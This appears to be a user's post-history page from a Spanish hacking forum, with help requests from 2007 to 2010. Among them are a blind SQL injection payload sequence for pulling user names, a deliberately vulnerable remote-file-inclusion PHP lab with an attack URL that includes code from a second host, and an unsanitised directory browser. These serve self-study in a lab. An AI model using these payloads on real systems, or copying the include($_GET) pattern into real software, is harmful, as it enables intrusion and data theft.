elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Temas
Páginas: 1 [2] 3
11  Foros Generales / Foro Libre / Hackean la web de las juventudes de la falange española en: 15 Mayo 2010, 16:23 pm
 
 Han metido una bandera de la republica en la pagina principal jajajaj

 os paso el enlace:

  http://www.informaticanova.com/seguridad-informatica/noticias-seguridad-informatica/hackean-la-web-de-las-juventudes-de-la-falange-espanola.html
12  Informática / Software / Aumento rápido de ratio NRPG RatioMaster en: 27 Abril 2009, 12:28 pm
Enlace a tutorial para Aumento rápido de ratio NRPG RatioMaster

http://www.informaticanova.com/seguridad-informatica/noticias-seguridad-informatica/aumento-rapido-de-ratiol-nrpg-ratiomaster.html



saludos

13  Informática / Tutoriales - Documentación / Nikto scanner de vulnerabilidades de servidores web en: 11 Marzo 2009, 17:27 pm

Un articulo que trata sobre Nikto

http://www.informaticanova.com/NOTICIAS-SEGURIDAD-INFORMATICA/nikto.html

 Saludos
14  Comunicaciones / Hacking Mobile / problemas bluezspammer en: 31 Octubre 2008, 16:52 pm


 Estoy trabajando con  wifislax 2.0, y llevo ya un par de dias loco tratando de hacer funcionar el bluezpammer... he mirado muchos post en internet la mayoria de Gospel

 EL mensaje de error que me da directamente despues de descubrir los dispositivos es:     Failed to conect to SDP server: operation already in progress

 Despues de mirar mucho en internet al respecto llegue a la conclusion de que primero debia de comprobar que con obexftp -b MAC -p archivo no tenia problemas

 Y lo que pasa tanto con obex como con  ussp-push mac canal archivo es que el telefono me pide un PIN  y ponga el que ponga no funciona....

 Tambien he leido sobre el pin y he visto algun post interesante respecto al pinhelper.... pero no doy con la solucion.. siempre me pide el telefono un pin
   
   ¿alguien puede ayudarme?

 Gracias por vuestro tiempo
15  Seguridad Informática / Nivel Web / duda con BSQL en: 29 Marzo 2008, 11:12 am

  Hola a tod@s, estoy teniendo un problema a la hora de realizar una inyeccion ciega, y quisiera saber si hay algo q este haciendo mal:

   He seguido los siguientes pasos:

 ... AND (SELECT Count(*) FROM Tabla) >= 0   para saber nombre de tabla

... AND (SELECT Count(campo) FROM Tabla) >= 0   para saber nombre de campo

     Con las dos sentencias anteriores no tengo problemas, saco los nombres de tablas y campos de las mismas.

 ... AND (SELECT Count(*) FROM Tabla WHERE campo LIKE ‘%’) > 0   para saber        contenido del campo

   con esta ultima inyeccion si tengo problemas, pq por ejemplo:

  ... AND (SELECT Count(*) FROM usuarios WHERE nombre LIKE ‘%’) > 0

   eso deberia darme cierto no????  ya que hay algun nombre metido en la tabla usuarios, pero siempre me da falso. Tambien he probado:

AND (SELECT Count(*) FROM usuarios WHERE nombre LIKE ‘a%’) > 0
AND (SELECT Count(*) FROM usuarios WHERE nombre LIKE ‘b%’) > 0


  Asi hasta la z y del 0 al 9...pero siempre da falso.

  Alguien puede decirme q estoy haceindo mal??

  Gracias de antemano



16  Programación / PHP / problemas con location en login contra LDAP PHP en: 19 Diciembre 2007, 19:00 pm


   Hola a tod@s.....  espero alguien pueda ayudarme pq es bien extraño esto que me pasa.
 
   Situacion: Estoy programando el acceso a una pagina que contendrá documentos separados en carpetas. Dependiendo del  grupo en el que el usuario se encuentre en el directorio activo, el directorio al que accedera sera uno u otro. Separando en principio dos grandes grupos, direccion y contabilidad.

   Mi problema es que trato de cargar con la funcion location una pagina u otra dependiendo del tipo de acceso. Ya he chequeado que la funcion que me comprueba el correcto login LDAP y tambien se que funciona bien la funcion que ve la pertenencia a un grupo determinado. pero no consigo que el location me envie donde necesito, ya que no hace nada.


   
Código:
$dominio="@midominio.local";
$user=addslashes__recursive($_POST["us"]).$dominio;
$pasw=addslashes__recursive($_POST["pas"]);
$MensajeSup=LoginLDAP($user,$pasw);
$direc=PerteneceA();

if ($direc=="" && $MensajeSup=="Acceso Permitido"){

echo "<h2><a href='http://192.168.9.117/index.php'>Volvel a la pagina de     Inicio</a><h2>";
echo"Usted pertenece al dominio, pero NO tiene permiso para el acceso a Intranet";
exit;
}

 if ($MensajeSup=="Acceso Permitido" && $direc<>""){
[b] header ("Location: http://192.168.9.117/acceso.php");[/b]
exit;
 }

Bueno a ver si alguien puede ayudarme.  Gracias de antemano

 pd:He puesto solo el trozo de codigo mas relevante, como pueden ver no he incluido si el usuario se equivoca con las credenciales de inicio de sesion,etc...
17  Programación / PHP / NAVEGADOR ARCHIVOS en: 30 Noviembre 2007, 13:51 pm
 
 Hola a tod@s, estoy intentando poner un navegador de archivos y directorios en una intranet. El código que uso es este:

Código:


  $dir = (isset($_GET['dir']))?$_GET['dir']:"/";
$directorio=opendir($dir);
echo "<b>Directorio actual:</b><br>$dir<br>";
echo "<b>Archivos:</b><br>";
while ($archivo = readdir($directorio)) {
  if($archivo == '.')
    echo "<a href="?dir=.">$archivo</a><br>";
  elseif($archivo == '..'){
    if($dir != '.'){
      $carpetas = split("/",$dir);
      array_pop($carpetas);
      $dir2 = join("/",$carpetas);
      echo "<a href="?dir=$dir2">$archivo</a><br>";
    }
  }
  elseif(is_dir("$dir/$archivo"))
    echo "<a href="?dir=$dir/$archivo">$archivo</a><br>";
  else echo "$archivo<br>";
}
closedir($directorio); 



El error que me sale es este: Parse error: syntax error, unexpected '='    y me lo indica en la linea   
Código:
elseif($archivo == '..'){

Gracias a todos por adelantado
18  Programación / PHP / sigo con problemass.... en: 10 Septiembre 2007, 16:05 pm

 Tambien he probado a instalar el apache para windows... y me dice lo mismo. Voy a pegar aki todo el codigo de los 3 archivos a ver si alguien me puede ayudar....


  1. El archivo pruebarfi.html

 
Código:
<HTML><HEAD><TITLE> Prueva de RFI </TITLE></HEAD><BODY>

 <A HREF="rfi.php?cont=hola.html">Hola!</A><BR><BR>
<A HREF="rfi.php?cont=adios.html">Adios!</A>

 </BODY></HTML>

  2. El archivo hola.html...es igual q adios.html... osea solo escrito hola y adios

 
Código:
holaaaa
Código:
adiosssss

  3. El archivo rfi.php

 
Código:
<?php

$var = $_GET["cont"];
include($var);

?>

  4.- El archivo  cede.txt

 
Código:
<?phpecho "<h1>Vulnerable a RFI</h1>";?>

  y lo que paso en la url seria 
Código:
http://192.168.1.2/fri.php?cont=http://192.168.1.3/code.txt
 
  El error que me da es el q reporte arriba


 Gracias a todos 
19  Programación / PHP / Problemas con XAMP en: 3 Septiembre 2007, 13:47 pm

 Hola a todos, antes de nada gracias por leer el post.

  Mi problema es el siguiente:

   Estoy siguiendo un buen tutorial que hay en el foro, que trata sobre vulnerabilidades web. Al montar dos servidores web, con el paquete XAMP (apache,mysql y filezilla) para tratar de crear el entorno adecuado de prueba de una vulnerabilidad RFI me ocurre lo siguiente:

Código:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\xampp\htdocs\pruebarfi\rfi.php on line 4

Warning: include(http://192.168.9.222/code.txt) [function.include]: failed to open stream: no suitable wrapper could be found in C:\xampp\htdocs\pruebarfi\\rfi.php on line 4

Warning: include() [function.include]: Failed opening 'http://192.168.9.222/code.txt' for inclusion (include_path='.;C:\xampp\php\pear\') in C:\xampp\htdocs\pruebarfi\rfi.php on line 4

Ese es el error que se muesta, el cual hace referencia a estas lineas de codigo, concretamente a la funcion include que es la que permite la vulnerabilidad, y que esta contenida en el archivo rfi.php:
   
Código:
<?php
$var = $_GET(cont");
include($var);
?>
 


  Creo que tiene algo que ver con la configuracion del path de XAMP.. pero no se que pasa. A ver si alguien puede ayudarme. 

 No se si este es el sitio adecuado para exponer el problema, si no es este ya lo moveran.....

Gracias
20  Foros Generales / Sugerencias y dudas sobre el Foro / MOSTRAR POST NO LEIDOS ORGANIZADO POR TEMAS en: 19 Agosto 2007, 11:39 am

 Creo que no hace falta explicar muchos mas....  cada vez que le das a mostrar mensajes no leidos desde la ultima visita, se entremezclan todos los temas.... haciendo que sea muy pesado leer sobre los que te interesa....  hay ya demasiado temas diferentes y es realmente tedioso......

  Gracias y espero que se pueda hacer algo, aunke supongo que no soy el primero el pedirlo.

Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines